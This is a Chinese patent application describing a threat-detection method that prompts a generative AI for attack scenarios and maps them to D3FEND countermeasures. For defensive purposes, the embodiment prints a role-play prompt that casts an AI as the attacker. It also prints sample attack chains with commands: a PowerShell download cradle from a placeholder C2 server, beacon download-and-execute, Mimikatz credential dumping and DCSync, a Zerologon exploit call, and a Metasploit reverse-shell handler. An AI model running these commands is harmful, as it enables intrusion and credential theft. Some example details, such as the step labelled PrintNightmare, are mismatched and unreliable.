CN116846610A - 网络安全威胁检测方法、装置、设备和介质 - Google Patents

Abstract

本申请提供了一种网络安全威胁检测方法、装置、设备和介质，其中方法包括：获取目标业务场景的关键词信息；根据关键词信息和智能内容生成模块，确定目标业务场景的安全威胁信息；根据网络安全对策知识图谱，确定安全威胁信息对应的安全建议；根据安全威胁信息和安全建议，生成目标业务场景的安全威胁检测报告。本申请可以实现自动化检测各个业务场景面临的各类网络安全攻击技术，可以降低网络安全风险的检测成本，提升网络安全风险的检测效率，同时可以提升对新型网络安全攻击技术的安全风险检测能力，从而能够及时地发现各个业务面临的新型网络攻击技术。

Description

网络安全威胁检测方法、装置、设备和介质

技术领域

本申请实施例涉及网络安全技术领域，尤其涉及一种网络安全威胁检测方法、装置、设备和介质。

背景技术

随着网络技术的日趋成熟，互联网技术的应用已经遍布到世界的各个角落。但与之对应的网络安全也越来越受到各个企业的关注和重视。

目前，为了有效防止网络安全问题的发生，企业会定期对相关业务安排专业安全人员进行威胁建模，渗透测试及风险排查。然而，专业安全人员是基于互联网已经公开的威胁检测框架、已知攻击技术产生的日志数据，通过人工手段对已有网络数据进行分析，以此检测各类网络安全攻击技术，这种检测方式不仅耗时耗力，效率低下，并且对于不同业务出现的新型网络安全攻击技术，存在对网络攻击威胁检测的滞后性。

发明内容

本申请提供一种网络安全威胁检测方法、装置、设备和介质，实现自动化检测各个业务场景面临的各类网络安全攻击技术，可以降低网络安全风险的检测成本，提升网络安全风险的检测效率，同时可以提升对新型网络安全攻击技术的安全风险检测能力，从而能够及时地发现各个业务面临的新型网络攻击技术。

第一方面，本申请提供了一种网络安全威胁检测方法，包括：

获取目标业务场景的关键词信息；

根据所述关键词信息和智能内容生成模块，确定所述目标业务场景的安全威胁信息；

根据网络安全对策知识图谱，确定所述安全威胁信息对应的安全建议；

根据所述安全威胁信息和所述安全建议，生成所述目标业务场景的安全威胁检测报告。

在一些可选的实现方式中，所述根据所述关键词信息和智能内容生成模块，确定所述目标业务场景的安全威胁信息，包括：

根据所述关键词信息，确定所述智能内容生成模块的输入信息；

将所述输入信息输入至所述智能内容生成模块中，通过所述智能内容生成模块运行应答模型，以使所述应答模型根据所述输入信息确定输出信息；

根据所述输出信息，确定所述目标业务场景的安全威胁信息。

在一些可选的实现方式中，所述根据所述关键词信息，确定所述智能内容生成模块的输入信息，包括：

基于询问话术模板库，确定并显示与所述关键词信息对应的至少一个候选询问话术模板；

响应于对任一候选询问话术模板的编辑操作，生成目标询问话术，将所述目标询问话术作为所述智能内容生成模块的输入信息。

在一些可选的实现方式中，所述根据所述输出信息，确定所述目标业务场景的安全威胁信息，包括：

从所述输出信息中提取所述目标业务场景的至少一个初始安全威胁信息；

对每个所述初始安全威胁信息进行模拟验证，以从至少一个所述初始安全威胁信息中筛选最终的安全威胁信息，其中所述最终的安全威胁信息为所述目标业务场景的安全威胁信息。

在一些可选的实现方式中，所述对每个所述初始安全威胁信息进行模拟验证，以从至少一个所述初始安全威胁信息中筛选最终的安全威胁信息，包括：

将每个所述初始安全威胁信息作为命令输入至验证进程中，以通过所述验证进程运行每个所述初始安全威胁信息，得到每个所述初始安全威胁信息的运行结果；

根据每个所述初始安全威胁信息的运行结果，从至少一个所述初始安全威胁信息中筛选最终的安全威胁信息。

在一些可选的实现方式中，所述根据每个所述初始安全威胁信息，从至少一个所述初始安全威胁信息中筛选最终的安全威胁信息，包括：

解析每个所述初始安全威胁信息的运行结果；

响应于检测到任意所述初始安全威胁信息的运行结果存在预设返回信息，确定所述初始安全威胁信息为最终的安全威胁信息。

在一些可选的实现方式中，所述方法还包括：

响应于确定所述输出信息与所述输入信息未对应，根据预设可用关键词从所述输出信息中筛选可用的初始安全威胁信息；

响应于从所述输出信息中未筛选出可用的初始安全威胁信息，控制所述智能内容生成模块根据所述输入信息重新确定输出信息，直至从最新的输出信息中提取到所述目标业务场景的初始安全威胁信息为止。

在一些可选的实现方式中，所述根据网络安全对策知识图谱，确定所述安全威胁信息对应的安全建议，包括：

从所述安全威胁信息中提取查询关键词；

根据所述查询关键词，在所述网络安全对策知识图谱中确定所述安全威胁信息对应的安全建议。

在一些可选的实现方式中，当查询关键词与所述网络安全对策知识图谱中的安全建议之间的对应关系为一对多时，所述在所述网络安全对策知识图谱中确定所述安全威胁信息对应的安全建议，包括：

根据所述查询关键词，在所述网络安全对策知识图谱中确定与所述查询关键词对应的至少两个候选安全建议；

根据所述查询关键词在所述安全威胁信息中的上下文信息，确定每个所述候选安全建议和所述查询关键词之间的匹配度；

根据所述匹配度，从所有候选安全建议中确定所述安全威胁信息对应的安全建议。

在一些可选的实现方式中，所述根据所述匹配度，从所有候选安全建议中确定所述安全威胁信息对应的安全建议，包括：

确定所有匹配度中的最高匹配度；

将所述最高匹配度对应的候选安全建议，确定为所述安全威胁信息对应的安全建议。

在一些可选的实现方式中，所述确定所有匹配度中的最高匹配度之后，还包括：

响应于检测最高匹配度的数量为至少两个，从所有最高匹配度对应的候选安全建议中选取任一候选安全建议作为所述安全威胁信息对应的安全建议；

或者，

响应于检测最高匹配度的数量为至少两个，将所有最高匹配度对应的候选安全建议作为所述安全威胁信息对应的安全建议。

在一些可选的实现方式中，所述方法还包括：

响应于返回控件的触发操作，显示所述最高匹配度对应的候选安全建议；

响应于对任一所述最高匹配度对应的候选安全建议的触发操作，将所述候选安全建议确定为所述安全威胁信息对应的安全建议。

在一些可选的实现方式中，所述获取目标业务场景的关键词信息，包括：

根据所述目标业务场景的标识信息，获取所述关键词信息，其中所述目标业务场景的标识信息用于唯一标识相应的目标业务场景；

和/或，

根据所述目标业务场景面临的安全威胁，获取所述关键词信息。

第二方面，本申请提供了一种网络安全威胁检测装置，包括：

信息获取模块，用于获取目标业务场景的关键词信息；

威胁确定模块，用于根据所述关键词信息和智能内容生成模块，确定所述目标业务场景的安全威胁信息；

建议确定模块，用于根据网络安全对策知识图谱，确定所述安全威胁信息对应的安全建议；

结果获取模块，用于根据所述安全威胁信息和所述安全建议，生成所述目标业务场景的安全威胁检测报告。

在一些可选的实现方式中，所述威胁确定模块，包括：

第一确定单元，用于根据所述关键词信息，确定所述智能内容生成模块的输入信息；

第二确定单元，用于将所述输入信息输入至所述智能内容生成模块中，通过所述智能内容生成模块运行应答模型，以使所述应答模型根据所述输入信息确定输出信息；

第三确定单元，用于根据所述输出信息，确定所述目标业务场景的安全威胁信息。

在一些可选的实现方式中，所述第一确定单元，具体用于：

基于询问话术模板库，确定并显示与所述关键词信息对应的至少一个候选询问话术模板；

响应于对任一候选询问话术模板的编辑操作，生成目标询问话术，将所述目标询问话术作为所述智能内容生成模块的输入信息。

在一些可选的实现方式中，所述第三确定单元，具体用于：

从所述输出信息中提取所述目标业务场景的至少一个初始安全威胁信息；

对每个所述初始安全威胁信息进行模拟验证，以从至少一个所述初始安全威胁信息中筛选最终的安全威胁信息，其中所述最终的安全威胁信息为所述目标业务场景的安全威胁信息。

在一些可选的实现方式中，所述第三确定单元，还用于：

将每个所述初始安全威胁信息作为命令输入至验证进程中，以通过所述验证进程运行每个所述初始安全威胁信息，得到每个所述初始安全威胁信息的运行结果；

根据每个所述初始安全威胁信息，从至少一个所述初始安全威胁信息中筛选最终的安全威胁信息。

在一些可选的实现方式中，所述第三确定单元，还用于：

解析每个所述初始安全威胁信息的运行结果；

响应于检测到任意所述初始安全威胁信息的运行结果存在预设返回信息，确定所述初始安全威胁信息为最终的安全威胁信息。

在一些可选的实现方式中，所述第三确定单元，还用于：

响应于确定所述输出信息与所述输入信息未对应，根据预设可用关键词从所述输出信息中筛选可用的初始安全威胁信息；

响应于从所述输出信息中未筛选出可用的初始安全威胁信息，则控制所述智能内容生成模块根据所述输入信息重新确定输出信息，直至从最新的输出信息中提取到所述目标业务场景的初始安全威胁信息为止。

在一些可选的实现方式中，所述建议确定模块，包括：

提取单元，用于从所述安全威胁信息中提取查询关键词；

第四确定单元，用于根据所述查询关键词，在所述网络安全对策知识图谱中确定所述安全威胁信息对应的安全建议。

在一些可选的实现方式中，当查询关键词与所述网络安全对策知识图谱中的安全建议之间的对应关系为一对多时，所述第四确定单元，具体用于：

根据所述查询关键词，在所述网络安全对策知识图谱中确定与所述查询关键词对应的至少两个候选安全建议；

根据所述查询关键词在所述安全威胁信息中的上下文信息，确定每个所述候选安全建议和所述查询关键词之间的匹配度；

根据所述匹配度，从所有候选安全建议中确定所述安全威胁信息对应的安全建议。

在一些可选的实现方式中，所述第四确定单元，还用于：

确定所有匹配度中的最高匹配度；

将所述最高匹配度对应的候选安全建议，确定为所述安全威胁信息对应的安全建议。

在一些可选的实现方式中，所述第四确定单元，还用于：

响应于检测最高匹配度的数量为至少两个，从所有最高匹配度对应的候选安全建议中选取任一候选安全建议作为所述安全威胁信息对应的安全建议；

或者，

响应于检测最高匹配度的数量为至少两个，将所有最高匹配度对应的候选安全建议作为所述安全威胁信息对应的安全建议。

在一些可选的实现方式中，所述建议确定模块，还包括：

第一响应单元，用于响应于返回控件的触发操作，显示所述最高匹配度对应的候选安全建议；

第二响应单元，用于响应于对任一所述最高匹配度对应的候选安全建议的触发操作，将所述候选安全建议确定为所述安全威胁信息对应的安全建议。

在一些可选的实现方式中，所述获取模块，具体用于：

根据所述目标业务场景的标识信息，获取所述关键词信息，其中所述目标业务场景的标识信息用于唯一标识相应的目标业务场景；

和/或，

根据所述目标业务场景面临的安全威胁，获取所述关键词信息。

第三方面，本申请提供了一种电子设备，包括：

处理器和存储器，所述存储器用于存储计算机程序，所述处理器用于调用并运行所述存储器中存储的计算机程序，以执行如第一方面实施例所述的网络安全威胁检测方法。

第四方面，本申请提供了一种计算机可读存储介质，用于存储计算机程序，所述计算机程序使得计算机执行如第一方面实施例所述的网络安全威胁检测方法。

第五方面，本申请提供了一种包含程序指令的计算机程序产品，当程序指令在电子设备上运行时，使得电子设备执行如第一方面实施例所述的网络安全威胁检测方法。

本申请实施例公开的技术方案，至少具有如下有益效果：

通过获取目标业务场景的关键词信息，以根据关键词信息和智能内容生成模块，确定目标业务场景的安全威胁信息，进而根据网络安全对策知识图谱，确定安全威胁信息对应的安全建议，根据安全威胁信息和安全建议，生成目标业务场景的安全威胁检测报告。本申请通过利用智能内容生成模块和网络安全对策知识图谱，可以实现自动化检测各个业务场景面临的各类网络安全攻击技术，可以降低网络安全风险的检测成本，提升网络安全风险的检测效率，同时可以提升对新型网络安全攻击技术的安全风险检测能力，从而能够及时地发现各个业务面临的新型网络攻击技术。

附图说明

为了更清楚地说明本申请实施例中的技术方案，下面将对实施例描述中所需要使用的附图作简单地介绍，显而易见地，下面描述中的附图仅仅是本申请的一些实施例，对于本领域普通技术人员来讲，在不付出创造性劳动的前提下，还可以根据这些附图获得其他的附图。

图1是本申请实施例提供的一种网络安全威胁检测方法的流程示意图；

图2是本申请实施例提供的另一种网络安全威胁检测方法的流程示意图；

图3是本申请实施例提供的一种对初始安全威胁信息1进行模拟验证的示意图；

图4是本申请实施例提供的再一种网络安全威胁检测方法的流程示意图；

图5是本申请实施例提供的一种网络安全威胁检测装置的示意性框图；

图6是本申请实施例提供的一种电子设备的示意性框图；

图7是本申请实施例提供的一种计算机可读存储介质示意性框图。

具体实施方式

下面将结合本发明实施例中的附图，对本发明实施例中的技术方案进行清楚、完整地描述，显然，所描述的实施例仅仅是本发明一部分实施例，而不是全部的实施例。基于本发明中的实施例，本领域普通技术人员在没有做出创造性劳动的前提下所获得的所有其他实施例，都属于本发明保护的范围。

需要说明的是，本发明的说明书和权利要求书及上述附图中的术语“第一”、“第二”等是用于区别类似的对象，而不必用于描述特定的顺序或先后次序。应该理解这样使用的数据在适当情况下可以互换，以便这里描述的本发明的实施例能够以除了在这里图示或描述的那些以外的顺序实施。此外，术语“包括”和“具有”以及他们的任何变形，意图在于覆盖不排他的包含，例如，包含了一系列步骤或单元的过程、方法、***、产品或服务器不必限于清楚地列出的那些步骤或单元，而是可包括没有清楚地列出的或对于这些过程、方法、产品或设备固有的其它步骤或单元。

随着网络技术的日趋成熟，网络安全越来越受到各个企业的关注和重视。为了有效方式网络安全问题的发生，企业会定期对相关业务安排专业安全人员进行威胁建模，渗透测试以及风险排查。专业安全人员是基于互联网已经公开的威胁检测框架和已知攻击技术产生的日志数据，通过人工手段对已有网络数据进行分析，依次检测各类网络安全攻击技术。但是上述检测方式不仅耗时耗力，效率低下，并且对于不同业务出现的新型网络安全攻击技术，会存在的网络攻击威胁检测的滞后性。因此，本申请提供了一种网络安全威胁检测方案，实现自动化检测各个业务场景面临的各类网络安全攻击技术，降低检测成本，提高检测效率，同时提高对新型网络安全攻击技术的检测及时性。

对本申请实施例进行详细说明之前，首先对本申请实施例中涉及到的名词和术语进行说明，本申请实施例中涉及的名词和术语适用于如下解释：

智能内容生成模块：是指包括利用人工智能技术来生成内容技术(ArtificialIntelligence Generative Content，简称为AIGC)的器件或部件，其中AICG的核心思想是利用人工智能模型，根据给定的主题、关键词、格式、风格等条件，自动生成各种类型的文本、图像、音频、视频等内容，属于一种新型内容生产方式。

人工智能(Artificial Intelligence，简称为AI)：是利用数字计算机或者数字计算机控制的机器模拟、延伸和扩展人的智能，感知环境、获取知识并使用知识获得最佳结果的理论、方法、技术及应用***。换言之，人工智能是计算机科学的一个综合技术，它企图了解智能的实质，并生产出一种新的能以人类智能相似的方式做出反应的智能机器。

网络安全对策知识图谱(D3FEND)：由MITRE公司的NSEC(National SecurityEngineering Center)进行管理发布的网络安全对抗技术的知识库，确切的说是网络安全对策知识图谱，是一个攻击行为或者技术衍生出并映射对应防御技术的知识库。

Suricata：是一个高性能的网络IDS、IPS和网络安全监控引擎。

Suricata规则：是指Suricata中的司法规则。

C2服务器：是指C&C服务器，因有2个C所以简称为C2服务器。

CVE：英文全称为：Common Vulnerabilities&Exposures，简称为CVE，中文名称为：公共漏洞和暴露。CVE就好像是一个字典表，为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。使用一个共同的名字，可以帮助用户在各自独立的各种漏洞数据库中和漏洞评估工具中共享数据，虽然这些工具很难整合在一起。这样就使得CVE成为了安全信息共享的“关键字”。如果在一个漏洞报告中指明的一个漏洞，如果有CVE名称，就可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息，解决安全问题。

横向移动：是指攻击者侵入企业***时，获取相关权限及重要数据的常见攻击手法。简单来说，横向移动是指攻击者成功攻击一台计算机后，由该计算机横向跨越到另一台计算机，获取相关权限，进而窃取敏感信息的活动。

域控：是域控制器的简称。域控制器是指在“域”模式下，至少有一台服务器负责每一台联入网络的电脑和用户的验证工作，相当于一个单位的门卫，其英文名为：DomainController，简成为DC。域控制器服务器是在任何环境下都应当确保其安全性的重要角色。对于依赖域控制器完成身份验证、组策略、以及一个中央轻量级目录访问协议目录的客户机、服务器以及应用软件而言，IT环境中域控制器的任何损失或信息泄露都可能是灾难性的。

IT：英文全称Internet Technology，中文名：互联网技术，它指在计算机技术的基础上开发建立的一种信息技术。

APT攻击：英文全称Advanced Persistent Threat，中文名：高级持续性威胁攻击。是一种以商业或政治目的为前提的特定攻击，其通过一系列具有针对性的攻击行为以获取某个组织的重要信息。APT攻击常采用多种攻击技术手段，包括一些最为先进的手段和社会工程学方法，并通过长时间持续性的网络渗透，一步步的获取内部网络权限，此后边长期潜伏在内部网络，不断地收集各种信息直至窃取到重要信息。

在介绍了本申请实施例涉及到的一些概念之后，下面结合附图对本申请实施例提供的一种网络安全威胁检测方法、装置、设备和介质进行详细说明。

图1是本申请实施例提供的一种网络安全威胁检测方法的流程示意图。本申请实施例可适用于网络安全检测场景，该网络安全威胁检测方法可由网络安全威胁检测装置来执行。并且，该网络安全威胁检测装置可由硬件和/或软件组成，并可集成于电子设备中。在本申请实施例中，电子设备可选为任意具备数据处理功能的硬件设备，例如智能手机、个人计算机(Personal Computer，简称PC)平板电脑、掌上电脑、笔记本电脑、超级移动个人计算机(ultra-mobile personal computer，简称UMPC)、上网本、个人数字助理(personaldigital assistant，简称PDA)、可穿戴设备等，本申请对电子设备类型不做具体限制。

如图1所示，该方法可以包括如下步骤：

S101，获取目标业务场景的关键词信息。

其中，目标业务场景可选为任意业务场景，比如办公网业务场景、业务网业务场景等，本申请对此不做任何限制。

在一些可实现方式中，可通过人工输入和/或自动收集等多种方式，获取目标业务场景的关键词信息。

上述自动收集方式可选为利用预设筛选规则，从具有各种业务场景相关数据的数据库或数据资源中筛选出目标业务场景的关键词信息。其中，预设筛选规则可以是任意能够筛选业务场景关键词信息的算法或策略，此处对其不做任何限制。

考虑到每个业务场景都有对应的标识信息，比如业务名称等，以及每个业务场景也会面临着不同的安全威胁。所以，本申请获取目标业务场景的关键词信息，可选的还包括如下方式：

方式一

根据目标业务场景的标识信息，获取关键词信息，其中目标业务场景的标识信息用于唯一标识相应的目标业务场景。

其中，目标业务场景的标识信息可选为目标业务场景的名称等身份信息。

示例性的，假设目标业务场景的名称为：办公网，那么可将【办公网】作为关键词信息。

又例如，假设目标业务场景的名称为：办公网，那么可将【办公网】作为关键词信息，同时考虑到上述办公网业务场景会存在网络安全问题，所以还可以将【安全】作为关键词信息。

方式二

根据目标业务场景面临的安全威胁，获取关键词信息。

考虑到不同业务场景会面临不同的安全威胁，所以本申请还可以根据目标业务场景面临的安全威胁来获取关键词信息。

示例性的，假设目标业务场景为办公网业务场景，那么可以确定在办公网业务场景下会面临着入侵的风险，并且该办公网业务场景在面临入侵时会存在【A方】、【B方】等专业关键词的称呼。那么，可以将【A方】、【B方】等专业关键词作为目标业务场景的关键词信息。

需要说明的是，上述获取目标业务场景的关键词信息的两种方式，可以单独实施，即实施方式一或者实施方式二，也可以将两种方式结合到一起实施，即实施方式一和实施方式二，本申请对上述两种方式的实施方式不做具体限制。

S102，根据关键词信息和智能内容生成模块，确定目标业务场景的安全威胁信息。

应理解的是，上述智能内容生成模块可选为包括AIGC技术的器件或部件。

考虑到AIGC技术是一种人工智能生成内容方式，可以通过利用人工智能模型，根据给定的主题、关键词、格式、风格等条件，自动生成各种类型的文本、图像、音频、视频等内容。并且，AIGC技术的优势在于它可以突破人类创作的限制，实现无限的内容创造。可以根据用户的需求和偏好，生成符合用户期望的内容，提高用户满意度，也可以节省人力和时间成本，提高内容生产的效率和规模。并且，还可以创造出人类无法想象的新颖和有趣的内容，拓展人类的知识和视野。

所以，本申请可基于获取到的关键词信息和智能内容生成模块，来确定目标业务场景的安全威胁信息。其中，安全威胁信息除了包括已有的网络安全攻击技术之外，还包括新型网络安全攻击技术。上述新型网络安全攻击技术至少包括先进的网络安全攻击技术和未知的网络安全攻击技术。

在一些可选的实现方式中，确定目标业务场景的安全威胁信息时，可首先根据关键词信息构建智能内容生成模块的输入信息。进而，将输入信息输入至智能内容生成模块，以使智能内容生成模块根据获取到的输入信息运行相关处理程序，比如应答模型或类似应答模型等，来生成与输入信息对应的输出信息。然后，通过对智能内容生成模块提供的输出信息进行梳理、验证及筛选等处理，确定目标业务场景的安全威胁信息。

可选的，上述根据关键词信息构建智能内容生成模块的输入信息，可以是根据关键词信息人工编辑针对目标业务场景网络安全检测的输入信息；或者，也可以是获取包括关键词信息的话术模板，并通过对获取到的话术模板进行再编辑以生成输入信息，等等，此处对构建智能内容生成模块的输入信息的具体实现方式不做任何限制。

S103，根据网络安全对策知识图谱，确定安全威胁信息对应的安全建议。

在本申请中，网络安全对策知识图谱是指D3FEND。

可选的，本申请可根据安全威胁信息，在网络安全对策知识图谱中查询与上述安全威胁信息对应的安全建议。

考虑到安全威胁信息的数据量可能较大，那么根据安全威胁信息在网络安全对策知识图谱中查询对应的安全建议时，需要网络安全对策知识图谱对安全威胁信息进行分词、提取等处理，导致安全建议确定过程比较繁琐且需要花费较长时间。

所以，可选的本申请可先从安全威胁信息中提取关键词，作为查询关键词。然后，根据提取到的查询关键词，在网络安全对策知识图谱中查询与安全威胁信息对应的安全建议，由此可以简化确定安全建议的查询步骤，提高安全建议的查询速度。

可选的，本申请从安全威胁信息中提取关键词，可通过各种提取方法实现，例如基于统计的关键词提取方法，从安全威胁信息中提取关键词；或者，基于机器学习的关键词提取方法，从安全威胁信息中提取关键词；又或者，基于Word2Vec词聚类的文本关键词提取方法，从安全威胁信息中提取关键词，等等，此处对其不做任何限制。

上述基于各种提取方法从安全威胁信息中提取关键词的实现过程，为常规技术方案，具体可参见已有方案，此处对其不做过多赘述。

S104，根据安全威胁信息和安全建议，生成目标业务场景的安全威胁检测报告。

获取到目标业务场景的安全威胁信息，以及与安全威胁信息对应的安全建议之后，本申请可将目标业务场景的安全威胁信息和安全建议进行汇总，以生成目标业务场景的安全威胁检测报告。

可以理解的是，上述汇总可以是将目标业务场景的安全威胁信息和安全建议进行拼接，以生成目标业务场景的安全威胁检测报告。

其中，将安全威胁信息和安全建议进行拼接的方式，可选为安全威胁信息+安全建议的方式，当然还可以是其他拼接方式，本申请对此不做任何限制。

示例性的，目标业务场景为场景A，场景A的安全威胁信息为：XXA1、XXA2、XXA3，与安全威胁信息XXA1对应的安全建议为YYYA，与安全威胁信息XXA2对应的安全建议为YYYB，与安全威胁信息XXA3对应的安全建议为YYYC。那么，对上述安全威胁信息：XXA1、XXA2、XXA3，以及与每个安全威胁信息对应的安全建议：YYYA、YYYB、YYYC进行汇总，生成场景A的安全威胁检测报告如下：

针对场景A存在以下风险：

安全威胁信息：XXA1、XXA2、XXA3；

安全建议：与XXA1对应的安全建议YYYA、与XXA2对应的安全建议YYYC、与XXA3对应的安全建议YYYC。

本申请提供的一种网络安全威胁检测方法，通过获取目标业务场景的关键词信息，以根据关键词信息和智能内容生成模块，确定目标业务场景的安全威胁信息，进而根据网络安全对策知识图谱，确定安全威胁信息对应的安全建议，根据安全威胁信息和安全建议，生成目标业务场景的安全威胁检测报告。本申请通过利用智能内容生成模块和网络安全对策知识图谱，可以实现自动化检测各个业务场景面临的各类网络安全攻击技术，可以降低网络安全风险的检测成本，提升网络安全风险的检测效率，同时可以提升对新型网络安全攻击技术的安全风险检测能力，从而能够及时地发现各个业务面临的新型网络攻击技术。

在上述实施例的基础上，下面结合图2，对本申请中根据关键词信息和智能内容生成模块，确定目标业务场景的安全威胁信息进行进一步解释说明。

如图2所示，该方法可以包括如下步骤：

S201，获取目标业务场景的关键词信息。

S202，根据关键词信息，确定智能内容生成模块的输入信息。

考虑到基于关键词信息确定智能内容生成模块的输入信息，可包括两种情况：

第一种情况，基于关键词信息纯人工编辑智能内容生成模块的输入信息。

第二种情况，基于关键词信息获取包括关键词信息的话术模板，进而通过对话术模板进行再编辑以生成智能内容生成模块的输入信息。

应理解的是，上述话术模板为询问话术模板。

考虑到基于询问话术模板生成智能内容生成模块的输入信息，可以降低用户纯人工编写的难度，同时还可以提高输入信息的生成速度。因此，本申请优选采用上述第二种情况来确定智能内容生成模块的输入信息。

在一些可选的实现方式中，根据关键词信息确定智能内容生成模块的输入信息，具体包括如下步骤：

步骤1，基于询问话术模板库，确定并显示与关键词信息对应的至少一个候选询问话术模板。

其中，询问话术模板库为基于不同业务场景预先构建的包括多个不同询问话术模板的数据库。并且，该询问话术模板库中的询问话术模板还可以定期进行更新，以满足不同业务场景的安全威胁检测需求。

可选的，本申请可根据关键词信息在询问话术模板库中查询包括该关键词信息的至少一个询问话术模板，并将查询到的至少一个询问话术模板确定为候选询问话术模板。然后，将查询的候选询问话术模板通过显示界面显示给用户，以使用户可从显示的至少一个询问话术模板来生成智能内容生成模块的输入信息。其中，用户可理解为执行网络安全检测的专业安全人员。

示例性的，假设关键词信息为【安全网】、【安全】、【A方】、【B方】，那么根据上述四个关键词信息在询问话术模板库中查询，以查询包括【安全网】、【安全】、【A方】、【B方】这四个关键词信息的一个或一个以上的询问话术模板。如果查询到的询问话术模板数量为三个，分别询问话术模板1、询问话术模板2和询问话术模板3，那么此时将询问话术模板1、询问话术模板2和询问话术模板3作为候选询问话术模板，并将上述三个候选询问话术模板显示给用户。

步骤2，响应于对任一候选询问话术模板的编辑操作，生成目标询问话术，将目标询问话术作为智能内容生成模板的输入信息。

以上述步骤1中的示例继续进行说明，假设用户点击选中候选询问话术模板2作为目标询问话术模板，那么将该目标询问话术模板2的状态从显示状态切换成编辑状态。进而，用户可根据安全威胁检测需求对处于编辑状态的目标询问话术模板2进行再编辑，以生成目标询问话术：【我需要你协助我扮演一个办公网安全工程师，以此来保护办公网环境下的办公安全。众所周知，办公网安全可以分为反入侵、反泄露，我想针对反入侵和你进行一场红蓝对抗的模拟演习，我扮演B方，你扮演A方。我需要你模拟攻击的具体技术以及细节，然后去扩展模拟的攻击路径，例如黑客通过邮件钓鱼技术，通过CVE某某漏洞，诱使员工点击恶意文件，然后黑客使用了某某恶意工具，获取了某某信息，然后利用了某某工具进行了密码破解，以及后续的横向移动，直至他拿下了域控，类似的例子，懂吗？请多多扩展，并且最后能够详细具体到能够模拟真实APT攻击路径行为。请帮我列举3个类似的例子，包括有A方使用各类恶意工具执行的命令行以及执行结果的显示，以及A方尝试使用的工具枚举(多列举一点A方为了躲避B方检测的各种新技术的利用)，以及每个例子B方对A方攻击技术后续sur icata规则以及windows终端4688日志的检测规则编写建议。】。

S203，将输入信息输入至智能内容生成模块中，通过智能内容生成模块运行应答模型，以使应答模型根据输入信息确定输出信息。

其中，应答模型可理解为对输入信息进行识别分析等各种处理的相关程序或处理进程，此处对其不做任何限制。

可选的，本申请可将生成的输入信息输入至智能内容生成模块中，通过智能内容生成模块运行自身中的应答模型，以使应答模型对输入信息进行识别分析等各种处理，以得到与输入信息对应的输出信息。

以前述步骤2中确定的输入信息为例进行继续说明，假设输入信息为：【我需要你协助我扮演一个办公网安全工程师，以此来保护办公网环境下的办公安全。众所周知，办公网安全可以分为反入侵、反泄露，我想针对反入侵和你进行一场红蓝对抗的模拟演习，我扮演B方，你扮演A方。我需要你模拟攻击的具体技术以及细节，然后去扩展模拟的攻击路径，例如黑客通过邮件钓鱼技术，通过CVE某某漏洞，诱使员工点击恶意文件，然后黑客使用了某某恶意工具，获取了某某信息，然后利用了某某工具进行了密码破解，以及后续的横向移动，直至他拿下了域控，类似的例子，懂吗？请多多扩展，并且最后能够详细具体到能够模拟真实APT攻击路径行为。请帮我列举3个类似的例子，包括有A方使用各类恶意工具执行的命令行以及执行结果的显示，以及A方尝试使用的工具枚举(多列举一点A方为了躲避B方检测的各种新技术的利用)，以及每个例子B方对A方攻击技术后续suricata规则以及windows终端4688日志的检测规则编写建议。】。那么，智能内容生成模块通过运行应答模型，以使应答模型根据上述输入信息确定输出信息。其中，输出信息可包括如下两部分：案例部分和威胁检测建议部分。

具体的，输出信息如下：

案例部分：

例子1：

攻击路径：邮件钓鱼->恶意宏->PowerShell Empire->Mimikatz->横向移动->域控制器

描述：A方通过发送带有恶意宏的Word文档进行邮件钓鱼攻击，诱使员工打开并执行PowerShell远控回连脚本，通过脚本连接到A方的C2服务器，建立持久控制。后续A方使用Mimikatz获取内存中的凭据并利用获取的凭据进行横向移动，寻找域控制器，最终使用凭据访问域控制器，获取域管理员权限。

风险攻击路径利用：

1、运行恶意宏：powershell-ExecutionPolicy Bypass-File"恶意宏.ps1"

2、使用PowerShell Empire连接C2服务器：powershell-nop-w hidden-c"IEX(New-Object Net.WebClient).downloadString('http://C2服务器IP地址:8000/PowerShellEmpire.ps1')"

3、Mimikatz获取凭据：mimikatz.exe"sekurlsa::logonpasswords"exit

4、CrackMapExec横向移动：crackmapexec smb目标IP地址/子网-u用户名-p密码

例子2：

攻击路径：网络钓鱼->CVE-2021-34527(PrintNightmare)->Cobalt Strike->BloodHound->域控制器

描述：A方通过设置一个伪装的企业登录页面进行网络钓鱼攻击，诱使员工输入凭据。利用PrintNightmare漏洞执行远程代码并获取***权限。部署Cobalt Strike Beacon，与C2服务器建立持久连接。使用BloodHound分析域内的权限关系，寻找域控制器，最终利用找到的路径攻击域控制器，获取域管理员权限。

风险攻击路径利用：

1、利用PrintNightmare漏洞获取***权限：powershell-c"(New-ObjectNet.WebClient).DownloadFile('https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_23/impacket-0.9.23.tar.gz','impacket-0.9.23.tar.gz')；tar xvzf impacket-0.9.23.tar.gz；cd impacket-0.9.23；pythonsetup.py install；python examples/ntlmrelayx.py-smb2support-t目标IP地址-u用户名-p密码"

2、部署Cobalt Strike Beacon：powershell-c"(New-Object Net.WebClient).DownloadFile('http://C2服务器IP地址:8000/beacon.bin','beacon.bin')；cmd.exe/c'beacon.bin'"

3、使用BloodHound分析域内的权限关系：将Cobalt Strike Beacon下载到本地，并上传到目标***，然后在Cobalt Strike控制台中执行以下命令：load aggcreds和usesharphound，接着导出BloodHound图表，并在BloodHound中分析域内的权限关系。

4、寻找域控制器：在BloodHound中查找与域控制器有关的信息，例如具有DCSync权限的账户、域控制器的IP地址等。

5、攻击域控制器：使用Mimikatz工具提取域管理员的凭据，并使用这些凭据登录域控制器，获取域管理员权限。命令行如下：mimikatz.exe"lsadump::dcsync/user:DOMAIN\krbtgt/domain:DOMAIN.local/authuser:USERNAME/aut hdomain:DOMAIN/authpassword:PASSWORD"

例子3：

攻击路径：恶意软件->Zerologon(CVE-2020-1472)->Metasploit->CrackMapExec->域控制器

描述：A方通过恶意软件感染员工计算机，利用Zerologon漏洞获取域控制器的***权限，使用Metasploit部署Meterpreter与C2服务器建立持久连接，使用CrackMapExec横向移动，收集更多凭据，最终攻击域控制器，获取域管理员权限。

风险攻击路径利用：

1、利用Zerologon漏洞获取域控制器***权限：python3 exploit.py-t<ip_address>-d<domain_name>-n<netbios_name>

2、使用Metasploit部署Meterpreter与C2服务器建立持久连接：

msfconsole

use exploit/multi/handler

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST<local_ip_address>

set LPORT<local_port>

run

